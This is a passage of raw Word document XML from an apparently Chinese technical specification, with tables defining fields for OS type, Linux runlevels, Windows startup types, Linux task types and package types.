    <w:p w14:paraId="2669AB3A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="537" w:name="_Toc115166341"/>
      <w:bookmarkStart w:id="538" w:name="系统类型"/>
      <w:bookmarkEnd w:id="536"/>
      <w:r>
        <w:t>系统类型</w:t>
      </w:r>
      <w:bookmarkEnd w:id="537"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="889"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="1071"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="13ACB0B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EDAA843" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6575E429" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段内容</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="76BEE038" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="550EC89E" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="630342F3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>osType</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0F2C5D84" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="340C4062" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>linux</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="3A29F9E5" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="33332725" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>osType</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4C7196CC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3CB30094" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>windows</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="77648EA5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="539" w:name="_Toc115166342"/>
      <w:bookmarkStart w:id="540" w:name="linux默认启动模式"/>
      <w:bookmarkEnd w:id="538"/>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>默认启动模式</w:t>
      </w:r>
      <w:bookmarkEnd w:id="539"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1010"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="5929"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="35A7D38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7C14294" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7C2424AB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段内容</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="119FAC76" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="755D2E7B" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="026BBA45" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>initLevel</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="79D587B5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0FC43620" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>关机。不能将系统缺省运行级别设置为0，否则无法启动。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="669E8850" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="12CD221E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>initLevel</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="62A28F12" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="11578BE5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>单用户模式，只允许root用户对系统进行维护。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1C8EA30E" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6AE040C6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>initLevel</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3821D25C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="048FD297" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>多用户模式，但不能使用NFS（相当于Windows下的网上邻居）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="612CC56A" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="27120C68" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>initLevel</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7A72ADB8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1C7F7809" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>字符界面的多用户模式。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="155E7484" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0D9E4CAD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>initLevel</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0CF0422C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="782743BC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>未定义。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1F0A389B" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="63A8B11C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>initLevel</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="599F721C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="54E98E70" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>图形界面的多用户模式。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="176B9D5C" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="662A4495" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>initLevel</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7E9603C2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5C1B1E70" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>重启。不能将系统缺省运行级别设置为6，否则会</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>一直重</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>启。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="168090C4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="541" w:name="_Toc115166343"/>
      <w:bookmarkStart w:id="542" w:name="windows启动类型"/>
      <w:bookmarkEnd w:id="540"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>windows启动类型</w:t>
      </w:r>
      <w:bookmarkEnd w:id="541"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1099"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="807"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="35FB25F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D3E6779" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3E14769B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段内容</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3216F67F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="3972F280" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7EECB85D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>startType</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5A69D21A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="28AE1546" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>注册表</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6DD3FA9D" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="09CDEAB3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>startType</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3BB19278" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="264CDD56" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>文件夹</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="78425916" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="543" w:name="_Toc115166344"/>
      <w:bookmarkStart w:id="544" w:name="linux任务类型"/>
      <w:bookmarkEnd w:id="542"/>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>任务类型</w:t>
      </w:r>
      <w:bookmarkEnd w:id="543"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1059"/>
        <w:gridCol w:w="1118"/>
        <w:gridCol w:w="1004"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="62D7BFD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4608B2B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="26C7B2EF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段内容</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="56284B25" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="09AFFD46" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="09E8003D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>taskType</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="245DE92C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>CRONTAB</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="41C6FBA0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>定时任务</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="64D82B4E" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3F94193B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>taskType</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2F98CC1E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>AT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="13DB7304" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>单个任务</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="3D87D121" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="54023AC8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>taskType</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7495F6A0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>BATCH</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="38234E83" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>批量任务</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1E6EBB27" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="545" w:name="_Toc115166345"/>
      <w:bookmarkStart w:id="546" w:name="linux安装包类型"/>
      <w:bookmarkEnd w:id="544"/>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>安装包类型</w:t>
      </w:r>
      <w:bookmarkEnd w:id="545"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="632"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="1717"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="3710943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90E8AAE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5DEB01F0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段内容</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1BB62E07" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="5E93B58F" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1212DB60" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="787699BC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>rpm</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="78F4B369" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>rpm安装类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="79E11DAA" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="63A916DF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
